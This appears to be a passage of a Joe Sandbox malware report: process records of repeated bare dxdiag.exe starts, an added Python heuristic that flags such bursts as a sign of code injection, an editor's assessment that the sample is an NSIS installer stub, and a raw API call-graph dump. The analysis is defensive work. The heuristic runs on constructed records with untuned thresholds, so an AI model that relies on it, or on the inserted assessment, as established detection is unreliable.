        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true

        Target ID:41
        Start time:05:16:56
        Start date:14/10/2024
        Path:C:\Windows\SysWOW64\dxdiag.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
        Imagebase:0x7b0000
        File size:222'720 bytes
        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Has exited:true
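
The process list above is dominated by bare dxdiag.exe and msiexec.exe starts (no arguments, all within 05:16:55 and 05:16:56), the trace a loader leaves when it keeps spawning a benign system binary to host injected code. The following is an added example, not part of the Joe Sandbox report or of any vendor tooling, that turns that observation into a triage heuristic: it parses records written in the report's own "Target ID" field layout (the records below are constructed, not copied) and flags any Windows-directory image started bare at least three times inside a five-second window. The thresholds and the Windows-directory filter are assumptions to be tuned per environment.

```python
"""Triage heuristic over a sandbox process list: flag a burst of the same
system binary started with no arguments.  Added example, not Joe Sandbox
tooling.  Records are constructed in the report's 'Target ID' field layout;
the thresholds and the Windows-directory filter are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed excerpt (not copied from the report): two bare msiexec.exe and
# three bare dxdiag.exe starts inside two seconds, one bare msiexec.exe
# minutes later, and one msiexec.exe run with real arguments.
SAMPLE_RECORDS = r"""
Target ID:25
Start time:05:16:55
Start date:14/10/2024
Path:C:\Windows\SysWOW64\msiexec.exe
Commandline:"C:\Windows\SysWOW64\msiexec.exe"

Target ID:26
Start time:05:16:56
Start date:14/10/2024
Path:C:\Windows\SysWOW64\msiexec.exe
Commandline:"C:\Windows\SysWOW64\msiexec.exe"

Target ID:35
Start time:05:16:56
Start date:14/10/2024
Path:C:\Windows\SysWOW64\dxdiag.exe
Commandline:"C:\Windows\SysWOW64\dxdiag.exe"

Target ID:36
Start time:05:16:56
Start date:14/10/2024
Path:C:\Windows\SysWOW64\dxdiag.exe
Commandline:"C:\Windows\SysWOW64\dxdiag.exe"

Target ID:37
Start time:05:16:56
Start date:14/10/2024
Path:C:\Windows\SysWOW64\dxdiag.exe
Commandline:"C:\Windows\SysWOW64\dxdiag.exe"

Target ID:90
Start time:05:21:03
Start date:14/10/2024
Path:C:\Windows\SysWOW64\msiexec.exe
Commandline:"C:\Windows\SysWOW64\msiexec.exe"

Target ID:91
Start time:05:21:10
Start date:14/10/2024
Path:C:\Windows\System32\msiexec.exe
Commandline:"C:\Windows\System32\msiexec.exe" /i setup.msi /qn
"""


def parse_records(text):
    """Split 'Target ID' blocks into dicts.  'Key:Value' lines are split on the
    first colon only, so the colons inside 'Start time' survive."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = dict(line.partition(":")[::2] for line in block.splitlines())
        fields = {k.strip(): v.strip() for k, v in fields.items()}
        fields["started"] = datetime.strptime(
            fields["Start date"] + " " + fields["Start time"], "%d/%m/%Y %H:%M:%S")
        records.append(fields)
    return records


def has_arguments(cmdline):
    """True if anything follows the (optionally quoted) image path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        close = cmdline.find('"', 1)
        rest = cmdline[close + 1:] if close != -1 else ""
    else:
        rest = cmdline.partition(" ")[2]
    return bool(rest.strip())


def find_hollowing_bursts(records, min_count=3, window_seconds=5):
    """Images under the Windows directory started bare at least `min_count`
    times within `window_seconds`.  One finding per image, largest burst first."""
    window = timedelta(seconds=window_seconds)
    starts = defaultdict(list)
    for r in records:
        path = r["Path"].lower()
        if path.startswith("c:\\windows\\") and not has_arguments(r["Commandline"]):
            starts[path].append(r["started"])
    findings = []
    for image, times in starts.items():
        times.sort()
        best, j = 0, 0
        for i, first in enumerate(times):          # two-pointer sliding window
            while j + 1 < len(times) and times[j + 1] - first <= window:
                j += 1
            best = max(best, j - i + 1)
        if best >= min_count:
            findings.append({"image": image, "burst": best, "bare_starts": len(times)})
    return sorted(findings, key=lambda f: -f["burst"])


if __name__ == "__main__":
    for f in find_hollowing_bursts(parse_records(SAMPLE_RECORDS)):
        print(f"{f['image']}: burst of {f['burst']} ({f['bare_starts']} bare starts)")
```

With the default five-second window only dxdiag.exe is reported; the three bare msiexec.exe starts are split across minutes and fall below the threshold, which is the point of keying on a burst rather than on a bare command line alone. Widening the window to ten minutes reports both images.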


          Execution Graph

          Execution Coverage:20.8%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:21.6%
          Total number of Nodes:1279
          Total number of Limit Nodes:27
          execution_graph (flattened; nodes grouped by the function they belong to, listing the API calls the graph attaches to them; callees the viewer folds are noted as "n API calls")

          Entry, bootstrap and teardown
            0x403358  #17 (ordinal import), SetErrorMode, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW, CharNextW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, SetEnvironmentVariableW (x2), DeleteFileW, lstrcmpiW, CreateDirectoryW, SetCurrentDirectoryW, CopyFileW, CloseHandle, MessageBoxIndirectW, GetCurrentProcess, ExitWindowsEx, CoUninitialize, ExitProcess
            0x402dba  GetTickCount, GetModuleFileNameW, GetFileSize, GlobalAlloc, CreateFileW, ReadFile (0x4032f7), SetFilePointer (0x40330d); 0x402d18 (33 API calls) and 0x403060 (46 API calls) are folded
            0x4037c0  CloseHandle (x2), FreeLibrary, GlobalFree

          Window and dialog pages
            0x4038b2  lstrcatW, lstrlenW, CharNextW, lstrcmpiW, GetFileAttributesW, LoadImageW, RegisterClassW (x2), SystemParametersInfoW, CreateWindowExW, ShowWindow, LoadLibraryW (x2), GetClassInfoW (x2), DialogBoxParamW
            0x403c55  SetWindowPos, ShowWindow, DestroyWindow, SetWindowLongW, GetDlgItem, SendMessageW, IsWindowEnabled, SetClassLongW, KiUserCallbackDispatcher, EnableWindow, GetSystemMenu, EnableMenuItem, lstrlenW, SetWindowTextW, CreateDialogParamW, GetWindowRect, ScreenToClient
            0x4042ca  CheckDlgButton, GetDlgItem, SendMessageW, GetSysColor, lstrlenW; 0x4044b0 (6 API calls) folded
            0x4045c8  GetDlgItem, SetWindowTextW, SHBrowseForFolderW, CoTaskMemFree, lstrcmpiW, lstrcatW, SetDlgItemTextW, GetDiskFreeSpaceW, MulDiv, GetDlgItemTextW (0x4056a8), lstrlenW and wsprintfW (0x404976)
            0x4052d1  GetDlgItem, CreateThread, CloseHandle, GetClientRect, GetSystemMetrics, SendMessageW, ShowWindow, CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu, OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData, CloseClipboard (copies the details list to the clipboard); OleInitialize and CoUninitialize around the worker thread (0x405265)
            0x404194  GetWindowLongW, GetSysColor, SetTextColor, SetBkMode, SetBkColor, DeleteObject, CreateBrushIndirect
            0x401389, 0x404106, 0x404162, 0x404179  SendMessageW (0x401389 also MulDiv); 0x40412d SetDlgItemTextW; 0x40414f KiUserCallbackDispatcher; 0x404241 lstrcpynW, lstrlenW

          Script handlers (0x4014d7 to 0x402744)
            0x4014d7  Sleep
            0x401752  lstrcatW, CompareFileTime, GetFileAttributesW, CreateFileW, SetFileTime, CloseHandle, MessageBoxIndirectW; 0x403060 (46 API calls) folded
            0x40194b  lstrlenW
            0x4019cf  lstrcmpiW, lstrcmpW
            0x401bca  SendMessageTimeoutW, SendMessageW, FindWindowExW
            0x401cc6  SetWindowLongW
            0x401d41  GetDC, GetDeviceCaps, MulDiv, ReleaseDC, CreateFontIndirectW
            0x401dc7  ShowWindow, EnableWindow
            0x401e51  CreateProcessW and CloseHandle (0x405663), WaitForSingleObject (x2), GetExitCodeProcess, CloseHandle, wsprintfW
            0x401ed4  FindFirstFileW and FindClose (0x40622b), wsprintfW
            0x402251  WritePrivateProfileStringW
            0x4022d3  RegOpenKeyExW, RegEnumKeyW, RegDeleteValueW, RegDeleteKeyW, RegCloseKey
            0x402452  RegOpenKeyExW (0x402c42), RegEnumKeyW, RegEnumValueW, RegCloseKey
            0x4024ca  GetFileAttributesW, CreateFileW (0x405b54)
            0x402744  FindNextFileW
            0x402b1b, 0x402b38  operand fetch, resolved through 0x405f0a (18 API calls, folded)

          String, path, file and registry helpers
            0x405192  lstrlenW, lstrcatW, SetWindowTextW, SendMessageW (x3)
            0x405728  GetFileAttributesW, SetFileAttributesW, DeleteFileW, RemoveDirectoryW
            0x405770  DeleteFileW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose (recurses into itself)
            0x405933, 0x405960, 0x40597f, 0x4059de, 0x40617c  lstrlenW, lstrcatW, CharNextW, CharPrevW
            0x405a3b  CharNextW, lstrlenW, GetFileAttributesW
            0x405ab9  lstrlenA, lstrcmpiA, CharNextA
            0x405b54  GetFileAttributesW, CreateFileW; 0x405bd7 ReadFile
            0x405c06  lstrcpyW, GetShortPathNameW (x2), CloseHandle (x2), wsprintfA, GetFileSize, GlobalAlloc, lstrcpyA, SetFilePointer, WriteFile, GlobalFree
            0x405db5  RegOpenKeyExW, RegQueryValueExW, RegCloseKey
            0x405e2f  wsprintfW
            0x405ee8  lstrcpynW
            0x405f0a  GetVersion, GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree, lstrcatW, lstrlenW, lstrcpynW
            0x40622b  FindFirstFileW, FindClose
            0x406252  GetModuleHandleA, LoadLibraryA, GetProcAddress
            0x40628b  2 API calls (folded)

          Assessment (editor's, not from the report): this layout, an entry at 0x403358 that runs through OleInitialize, SHGetFileInfoW, GetCommandLineW and GetTempPathW, script handlers for files, registry keys, INI entries and an ExecWait-style CreateProcessW/WaitForSingleObject/GetExitCodeProcess at 0x401e51, and import resolution through LoadLibraryA/GetProcAddress at 0x406252, is that of an NSIS installer stub. With Dynamic/Decrypted Code Coverage at 0%, the graph describes only that wrapper; nothing of the unpacked loader appears in it.
3703->3676 3704->3549 3705->3593 3706->3563 3707->3584 3708->3607 3710 405b90 GetTickCount GetTempFileNameW 3709->3710 3711 405bc6 3710->3711 3712 403356 3710->3712 3711->3710 3711->3712 3712->3551 3713->3622 3714->3624 3715->3628 3716->3647 3717->3639 3719 403b9c 3718->3719 3729 405e2f wsprintfW 3719->3729 3721 403c0d 3722 405f0a 18 API calls 3721->3722 3723 403c19 SetWindowTextW 3722->3723 3724 40393d 3723->3724 3725 403c35 3723->3725 3724->3663 3725->3724 3726 405f0a 18 API calls 3725->3726 3726->3725 3727->3660 3728->3665 3729->3721 3967 40155b 3968 40296b 3967->3968 3971 405e2f wsprintfW 3968->3971 3970 402970 3971->3970 3979 4023de 3980 402c42 19 API calls 3979->3980 3981 4023e8 3980->3981 3982 402b38 18 API calls 3981->3982 3983 4023f1 3982->3983 3984 4023fc RegQueryValueExW 3983->3984 3989 402791 3983->3989 3985 402422 RegCloseKey 3984->3985 3986 40241c 3984->3986 3985->3989 3986->3985 3990 405e2f wsprintfW 3986->3990 3990->3985 3991 401ce5 GetDlgItem GetClientRect 3992 402b38 18 API calls 3991->3992 3993 401d17 LoadImageW SendMessageW 3992->3993 3994 4029c5 3993->3994 3995 401d35 DeleteObject 3993->3995 3995->3994 3161 40206a 3177 402b38 3161->3177 3164 402b38 18 API calls 3165 40207b 3164->3165 3166 402b38 18 API calls 3165->3166 3167 402084 3166->3167 3168 402b38 18 API calls 3167->3168 3169 40208e 3168->3169 3170 402b38 18 API calls 3169->3170 3171 402098 3170->3171 3172 4020ac CoCreateInstance 3171->3172 3173 402b38 18 API calls 3171->3173 3176 4020cb 3172->3176 3173->3172 3175 402195 3176->3175 3183 401423 3176->3183 3178 402b44 3177->3178 3179 405f0a 18 API calls 3178->3179 3180 402b65 3179->3180 3181 402071 3180->3181 3182 40617c 5 API calls 3180->3182 3181->3164 3182->3181 3184 405192 25 API calls 3183->3184 3185 401431 3184->3185 3185->3175 3996 40156b 3997 401584 3996->3997 3998 40157b ShowWindow 3996->3998 3999 401592 ShowWindow 3997->3999 4000 4029c5 3997->4000 3998->3997 3999->4000 4001 4024ec 4002 4024f1 4001->4002 4003 40250a 4001->4003 4004 
402b1b 18 API calls 4002->4004 4005 402510 4003->4005 4006 40253c 4003->4006 4011 4024f8 4004->4011 4008 402b38 18 API calls 4005->4008 4007 402b38 18 API calls 4006->4007 4009 402543 lstrlenW 4007->4009 4010 402517 WideCharToMultiByte lstrlenA 4008->4010 4009->4011 4010->4011 4012 402565 WriteFile 4011->4012 4013 402791 4011->4013 4012->4013 3186 40276e 3187 402b38 18 API calls 3186->3187 3188 402775 FindFirstFileW 3187->3188 3189 402788 3188->3189 3190 40279d 3188->3190 3191 4027a6 3190->3191 3194 405e2f wsprintfW 3190->3194 3195 405ee8 lstrcpynW 3191->3195 3194->3191 3195->3189 4014 4018ef 4015 401926 4014->4015 4016 402b38 18 API calls 4015->4016 4017 40192b 4016->4017 4018 405770 71 API calls 4017->4018 4019 401934 4018->4019 4020 403870 4021 40387b 4020->4021 4022 403882 GlobalAlloc 4021->4022 4023 40387f 4021->4023 4022->4023 4024 402571 4025 402b1b 18 API calls 4024->4025 4029 402580 4025->4029 4026 40269e 4027 4025c6 ReadFile 4027->4026 4027->4029 4028 405bd7 ReadFile 4028->4029 4029->4026 4029->4027 4029->4028 4030 4026a0 4029->4030 4031 402606 MultiByteToWideChar 4029->4031 4033 4026b1 4029->4033 4034 40262c SetFilePointer MultiByteToWideChar 4029->4034 4036 405e2f wsprintfW 4030->4036 4031->4029 4033->4026 4035 4026d2 SetFilePointer 4033->4035 4034->4029 4035->4026 4036->4026 4037 4014f1 SetForegroundWindow 4038 4029c5 4037->4038 4046 4018f2 4047 402b38 18 API calls 4046->4047 4048 4018f9 4047->4048 4049 4056c4 MessageBoxIndirectW 4048->4049 4050 401902 4049->4050 4058 401df3 4059 402b38 18 API calls 4058->4059 4060 401df9 4059->4060 4061 402b38 18 API calls 4060->4061 4062 401e02 4061->4062 4063 402b38 18 API calls 4062->4063 4064 401e0b 4063->4064 4065 402b38 18 API calls 4064->4065 4066 401e14 4065->4066 4067 401423 25 API calls 4066->4067 4068 401e1b ShellExecuteW 4067->4068 4069 401e4c 4068->4069 4075 4026f7 4076 4026fe 4075->4076 4078 402970 4075->4078 4077 402b1b 18 API calls 4076->4077 4079 402709 4077->4079 4080 402710 SetFilePointer 4079->4080 
4080->4078 4081 402720 4080->4081 4083 405e2f wsprintfW 4081->4083 4083->4078 4091 40427b lstrlenW 4092 40429a 4091->4092 4093 40429c WideCharToMultiByte 4091->4093 4092->4093 4094 402c7d 4095 402ca8 4094->4095 4096 402c8f SetTimer 4094->4096 4097 402cf6 4095->4097 4098 402cfc MulDiv 4095->4098 4096->4095 4099 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 4098->4099 4099->4097 4101 4014ff 4102 401507 4101->4102 4104 40151a 4101->4104 4103 402b1b 18 API calls 4102->4103 4103->4104 4105 401000 4106 401037 BeginPaint GetClientRect 4105->4106 4107 40100c DefWindowProcW 4105->4107 4109 4010f3 4106->4109 4110 401179 4107->4110 4111 401073 CreateBrushIndirect FillRect DeleteObject 4109->4111 4112 4010fc 4109->4112 4111->4109 4113 401102 CreateFontIndirectW 4112->4113 4114 401167 EndPaint 4112->4114 4113->4114 4115 401112 6 API calls 4113->4115 4114->4110 4115->4114 4116 401a00 4117 402b38 18 API calls 4116->4117 4118 401a09 ExpandEnvironmentStringsW 4117->4118 4119 401a1d 4118->4119 4121 401a30 4118->4121 4120 401a22 lstrcmpW 4119->4120 4119->4121 4120->4121 4122 401b01 4123 402b38 18 API calls 4122->4123 4124 401b08 4123->4124 4125 402b1b 18 API calls 4124->4125 4126 401b11 wsprintfW 4125->4126 4127 4029c5 4126->4127 4128 404581 4129 404591 4128->4129 4130 4045b7 4128->4130 4132 40412d 19 API calls 4129->4132 4131 404194 8 API calls 4130->4131 4134 4045c3 4131->4134 4133 40459e SetDlgItemTextW 4132->4133 4133->4130 4135 405106 4136 405116 4135->4136 4137 40512a 4135->4137 4138 40511c 4136->4138 4147 405173 4136->4147 4139 405132 IsWindowVisible 4137->4139 4145 405149 4137->4145 4141 404179 SendMessageW 4138->4141 4142 40513f 4139->4142 4139->4147 4140 405178 CallWindowProcW 4143 405126 4140->4143 4141->4143 4148 404a5c SendMessageW 4142->4148 4145->4140 4153 404adc 4145->4153 4147->4140 4149 404abb SendMessageW 4148->4149 4150 404a7f GetMessagePos ScreenToClient SendMessageW 4148->4150 4151 404ab3 4149->4151 4150->4151 4152 404ab8 4150->4152 4151->4145 4152->4149 4162 
405ee8 lstrcpynW 4153->4162 4155 404aef 4163 405e2f wsprintfW 4155->4163 4157 404af9 4158 40140b 2 API calls 4157->4158 4159 404b02 4158->4159 4164 405ee8 lstrcpynW 4159->4164 4161 404b09 4161->4147 4162->4155 4163->4157 4164->4161 4165 401f08 4166 402b38 18 API calls 4165->4166 4167 401f0f GetFileVersionInfoSizeW 4166->4167 4168 401f8c 4167->4168 4169 401f36 GlobalAlloc 4167->4169 4169->4168 4170 401f4a GetFileVersionInfoW 4169->4170 4170->4168 4171 401f59 VerQueryValueW 4170->4171 4171->4168 4172 401f72 4171->4172 4176 405e2f wsprintfW 4172->4176 4174 401f7e 4177 405e2f wsprintfW 4174->4177 4176->4174 4177->4168 4185 404b0e GetDlgItem GetDlgItem 4186 404b60 7 API calls 4185->4186 4192 404d79 4185->4192 4187 404c03 DeleteObject 4186->4187 4188 404bf6 SendMessageW 4186->4188 4189 404c0c 4187->4189 4188->4187 4190 404c43 4189->4190 4195 405f0a 18 API calls 4189->4195 4193 40412d 19 API calls 4190->4193 4191 404e5d 4194 404f09 4191->4194 4200 404d6c 4191->4200 4204 404eb6 SendMessageW 4191->4204 4192->4191 4202 404a5c 5 API calls 4192->4202 4215 404dea 4192->4215 4199 404c57 4193->4199 4196 404f13 SendMessageW 4194->4196 4197 404f1b 4194->4197 4198 404c25 SendMessageW SendMessageW 4195->4198 4196->4197 4207 404f34 4197->4207 4208 404f2d ImageList_Destroy 4197->4208 4216 404f44 4197->4216 4198->4189 4203 40412d 19 API calls 4199->4203 4205 404194 8 API calls 4200->4205 4201 404e4f SendMessageW 4201->4191 4202->4215 4220 404c65 4203->4220 4204->4200 4210 404ecb SendMessageW 4204->4210 4206 4050ff 4205->4206 4211 404f3d GlobalFree 4207->4211 4207->4216 4208->4207 4209 4050b3 4209->4200 4217 4050c5 ShowWindow GetDlgItem ShowWindow 4209->4217 4213 404ede 4210->4213 4211->4216 4212 404d3a GetWindowLongW SetWindowLongW 4214 404d53 4212->4214 4224 404eef SendMessageW 4213->4224 4218 404d71 4214->4218 4219 404d59 ShowWindow 4214->4219 4215->4191 4215->4201 4216->4209 4228 404adc 4 API calls 4216->4228 4232 404f7f 4216->4232 4217->4200 4237 404162 SendMessageW 4218->4237 4236 
404162 SendMessageW 4219->4236 4220->4212 4223 404cb5 SendMessageW 4220->4223 4225 404d34 4220->4225 4226 404cf1 SendMessageW 4220->4226 4227 404d02 SendMessageW 4220->4227 4223->4220 4224->4194 4225->4212 4225->4214 4226->4220 4227->4220 4228->4232 4229 405089 InvalidateRect 4229->4209 4230 40509f 4229->4230 4234 404976 21 API calls 4230->4234 4231 404fad SendMessageW 4233 404fc3 4231->4233 4232->4231 4232->4233 4233->4229 4235 405037 SendMessageW SendMessageW 4233->4235 4234->4209 4235->4233 4236->4200 4237->4192 4238 404910 4239 404920 4238->4239 4240 40493c 4238->4240 4249 4056a8 GetDlgItemTextW 4239->4249 4242 404942 SHGetPathFromIDListW 4240->4242 4243 40496f 4240->4243 4245 404959 SendMessageW 4242->4245 4246 404952 4242->4246 4244 40492d SendMessageW 4244->4240 4245->4243 4248 40140b 2 API calls 4246->4248 4248->4245 4249->4244 4250 401491 4251 405192 25 API calls 4250->4251 4252 401498 4251->4252 4253 402293 4254 402b38 18 API calls 4253->4254 4255 4022a2 4254->4255 4256 402b38 18 API calls 4255->4256 4257 4022ab 4256->4257 4258 402b38 18 API calls 4257->4258 4259 4022b5 GetPrivateProfileStringW 4258->4259 4260 401718 4261 402b38 18 API calls 4260->4261 4262 40171f SearchPathW 4261->4262 4263 40173a 4262->4263 4264 401f98 4265 401faa 4264->4265 4275 40205c 4264->4275 4266 402b38 18 API calls 4265->4266 4268 401fb1 4266->4268 4267 401423 25 API calls 4269 402195 4267->4269 4270 402b38 18 API calls 4268->4270 4271 401fba 4270->4271 4272 401fd0 LoadLibraryExW 4271->4272 4273 401fc2 GetModuleHandleW 4271->4273 4274 401fe1 4272->4274 4272->4275 4273->4272 4273->4274 4284 4062be WideCharToMultiByte 4274->4284 4275->4267 4278 401ff2 4281 401423 25 API calls 4278->4281 4282 402002 4278->4282 4279 40202b 4280 405192 25 API calls 4279->4280 4280->4282 4281->4282 4282->4269 4283 40204e FreeLibrary 4282->4283 4283->4269 4285 4062e8 GetProcAddress 4284->4285 4286 401fec 4284->4286 4285->4286 4286->4278 4286->4279 4287 40159b 4288 402b38 18 API calls 4287->4288 4289 
4015a2 SetFileAttributesW 4288->4289 4290 4015b4 4289->4290 4291 40149e 4292 40223c 4291->4292 4293 4014ac PostQuitMessage 4291->4293 4293->4292 4294 40219e 4295 402b38 18 API calls 4294->4295 4296 4021a4 4295->4296 4297 402b38 18 API calls 4296->4297 4298 4021ad 4297->4298 4299 402b38 18 API calls 4298->4299 4300 4021b6 4299->4300 4301 40622b 2 API calls 4300->4301 4302 4021bf 4301->4302 4303 4021d0 lstrlenW lstrlenW 4302->4303 4304 4021c3 4302->4304 4306 405192 25 API calls 4303->4306 4305 405192 25 API calls 4304->4305 4308 4021cb 4304->4308 4305->4308 4307 40220e SHFileOperationW 4306->4307 4307->4304 4307->4308 4309 4029a0 SendMessageW 4310 4029c5 4309->4310 4311 4029ba InvalidateRect 4309->4311 4311->4310 4319 401b22 4320 401b73 4319->4320 4321 401b2f 4319->4321 4323 401b78 4320->4323 4324 401b9d GlobalAlloc 4320->4324 4322 402229 4321->4322 4328 401b46 4321->4328 4325 405f0a 18 API calls 4322->4325 4333 401bb8 4323->4333 4340 405ee8 lstrcpynW 4323->4340 4326 405f0a 18 API calls 4324->4326 4327 402236 4325->4327 4326->4333 4334 4056c4 MessageBoxIndirectW 4327->4334 4338 405ee8 lstrcpynW 4328->4338 4331 401b8a GlobalFree 4331->4333 4332 401b55 4339 405ee8 lstrcpynW 4332->4339 4334->4333 4336 401b64 4341 405ee8 lstrcpynW 4336->4341 4338->4332 4339->4336 4340->4331 4341->4333 4342 402222 4343 402229 4342->4343 4345 40223c 4342->4345 4344 405f0a 18 API calls 4343->4344 4346 402236 4344->4346 4347 4056c4 MessageBoxIndirectW 4346->4347 4347->4345 4354 402727 4355 4029c5 4354->4355 4356 40272e 4354->4356 4357 402734 FindClose 4356->4357 4357->4355 4358 401cab 4359 402b1b 18 API calls 4358->4359 4360 401cb2 4359->4360 4361 402b1b 18 API calls 4360->4361 4362 401cba GetDlgItem 4361->4362 4363 4024e6 4362->4363 3196 40232f 3197 402335 3196->3197 3198 402b38 18 API calls 3197->3198 3199 402347 3198->3199 3200 402b38 18 API calls 3199->3200 3201 402351 RegCreateKeyExW 3200->3201 3202 402791 3201->3202 3203 40237b 3201->3203 3204 402396 3203->3204 3205 402b38 18 API calls 
3203->3205 3206 4023a2 3204->3206 3208 402b1b 18 API calls 3204->3208 3207 40238c lstrlenW 3205->3207 3209 4023bd RegSetValueExW 3206->3209 3213 403060 3206->3213 3207->3204 3208->3206 3211 4023d3 RegCloseKey 3209->3211 3211->3202 3214 403070 SetFilePointer 3213->3214 3215 40308c 3213->3215 3214->3215 3228 40317b GetTickCount 3215->3228 3218 405bd7 ReadFile 3219 4030ac 3218->3219 3220 40317b 43 API calls 3219->3220 3224 403137 3219->3224 3221 4030c3 3220->3221 3222 40313d ReadFile 3221->3222 3221->3224 3227 4030d3 3221->3227 3222->3224 3224->3209 3225 405bd7 ReadFile 3225->3227 3226 403106 WriteFile 3226->3224 3226->3227 3227->3224 3227->3225 3227->3226 3229 4032e5 3228->3229 3230 4031aa 3228->3230 3232 402d18 33 API calls 3229->3232 3241 40330d SetFilePointer 3230->3241 3237 403093 3232->3237 3233 4031b5 SetFilePointer 3238 4031da 3233->3238 3237->3218 3237->3224 3238->3237 3239 40326f WriteFile 3238->3239 3240 4032c6 SetFilePointer 3238->3240 3242 4032f7 3238->3242 3245 40638e 3238->3245 3252 402d18 3238->3252 3239->3237 3239->3238 3240->3229 3241->3233 3243 405bd7 ReadFile 3242->3243 3244 40330a 3243->3244 3244->3238 3246 4063b3 3245->3246 3247 4063bb 3245->3247 3246->3238 3247->3246 3248 406442 GlobalFree 3247->3248 3249 40644b GlobalAlloc 3247->3249 3250 4064c2 GlobalAlloc 3247->3250 3251 4064b9 GlobalFree 3247->3251 3248->3249 3249->3246 3249->3247 3250->3246 3250->3247 3251->3250 3253 402d41 3252->3253 3254 402d29 3252->3254 3256 402d51 GetTickCount 3253->3256 3257 402d49 3253->3257 3255 402d32 DestroyWindow 3254->3255 3258 402d39 3254->3258 3255->3258 3256->3258 3260 402d5f 3256->3260 3267 40628b 3257->3267 3258->3238 3261 402d94 CreateDialogParamW ShowWindow 3260->3261 3262 402d67 3260->3262 3261->3258 3262->3258 3271 402cfc 3262->3271 3264 402d75 wsprintfW 3265 405192 25 API calls 3264->3265 3266 402d92 3265->3266 3266->3258 3268 4062a8 PeekMessageW 3267->3268 3269 4062b8 3268->3269 3270 40629e DispatchMessageW 3268->3270 3269->3258 3270->3268 3272 402d0b 
3271->3272 3273 402d0d MulDiv 3271->3273 3272->3273 3273->3264 4364 4016af 4365 402b38 18 API calls 4364->4365 4366 4016b5 GetFullPathNameW 4365->4366 4367 4016f1 4366->4367 4368 4016cf 4366->4368 4369 4029c5 4367->4369 4370 401706 GetShortPathNameW 4367->4370 4368->4367 4371 40622b 2 API calls 4368->4371 4370->4369 4372 4016e1 4371->4372 4372->4367 4374 405ee8 lstrcpynW 4372->4374 4374->4367 4375 406c30 4378 4063c1 4375->4378 4376 406442 GlobalFree 4377 40644b GlobalAlloc 4376->4377 4377->4378 4379 406d2c 4377->4379 4378->4376 4378->4377 4378->4378 4378->4379 4380 4064c2 GlobalAlloc 4378->4380 4381 4064b9 GlobalFree 4378->4381 4380->4378 4380->4379 4381->4380 4382 4027b3 4383 402b38 18 API calls 4382->4383 4384 4027c1 4383->4384 4385 4027d7 4384->4385 4386 402b38 18 API calls 4384->4386 4387 405b2f 2 API calls 4385->4387 4386->4385 4388 4027dd 4387->4388 4408 405b54 GetFileAttributesW CreateFileW 4388->4408 4390 4027ea 4391 402893 4390->4391 4392 4027f6 GlobalAlloc 4390->4392 4395 40289b DeleteFileW 4391->4395 4396 4028ae 4391->4396 4393 40288a CloseHandle 4392->4393 4394 40280f 4392->4394 4393->4391 4409 40330d SetFilePointer 4394->4409 4395->4396 4398 402815 4399 4032f7 ReadFile 4398->4399 4400 40281e GlobalAlloc 4399->4400 4401 402862 WriteFile GlobalFree 4400->4401 4402 40282e 4400->4402 4404 403060 46 API calls 4401->4404 4403 403060 46 API calls 4402->4403 4407 40283b 4403->4407 4405 402887 4404->4405 4405->4393 4406 402859 GlobalFree 4406->4401 4407->4406 4408->4390 4409->4398 4410 4028b4 4411 402b1b 18 API calls 4410->4411 4412 4028ba 4411->4412 4413 4028f6 4412->4413 4414 4028dd 4412->4414 4415 402791 4412->4415 4416 402900 4413->4416 4417 40290c 4413->4417 4418 4028e2 4414->4418 4423 4028f3 4414->4423 4419 402b1b 18 API calls 4416->4419 4420 405f0a 18 API calls 4417->4420 4424 405ee8 lstrcpynW 4418->4424 4419->4423 4420->4423 4423->4415 4425 405e2f wsprintfW 4423->4425 4424->4415 4425->4415 4426 4014b8 4427 4014be 4426->4427 4428 401389 2 API calls 
4427->4428 4429 4014c6 4428->4429 3730 4015b9 3731 402b38 18 API calls 3730->3731 3732 4015c0 3731->3732 3733 4059de 4 API calls 3732->3733 3744 4015c9 3733->3744 3734 401614 3735 401646 3734->3735 3736 401619 3734->3736 3740 401423 25 API calls 3735->3740 3738 401423 25 API calls 3736->3738 3737 405960 CharNextW 3739 4015d7 CreateDirectoryW 3737->3739 3741 401620 3738->3741 3742 4015ed GetLastError 3739->3742 3739->3744 3747 40163e 3740->3747 3748 405ee8 lstrcpynW 3741->3748 3742->3744 3745 4015fa GetFileAttributesW 3742->3745 3744->3734 3744->3737 3745->3744 3746 40162d SetCurrentDirectoryW 3746->3747 3748->3746 4430 401939 4431 402b38 18 API calls 4430->4431 4432 401940 lstrlenW 4431->4432 4433 4024e6 4432->4433 4434 402939 4435 402b1b 18 API calls 4434->4435 4436 40293f 4435->4436 4437 402972 4436->4437 4438 40294d 4436->4438 4439 402791 4436->4439 4437->4439 4440 405f0a 18 API calls 4437->4440 4438->4439 4442 405e2f wsprintfW 4438->4442 4440->4439 4442->4439 4443 40653d 4445 4063c1 4443->4445 4444 406d2c 4445->4444 4446 406442 GlobalFree 4445->4446 4447 40644b GlobalAlloc 4445->4447 4448 4064c2 GlobalAlloc 4445->4448 4449 4064b9 GlobalFree 4445->4449 4446->4447 4447->4444 4447->4445 4448->4444 4448->4445 4449->4448 4450 40173f 4451 402b38 18 API calls 4450->4451 4452 401746 4451->4452 4453 405b83 2 API calls 4452->4453 4454 40174d 4453->4454 4454->4454

          Control-flow Graph

          • Executed
          • Not Executed
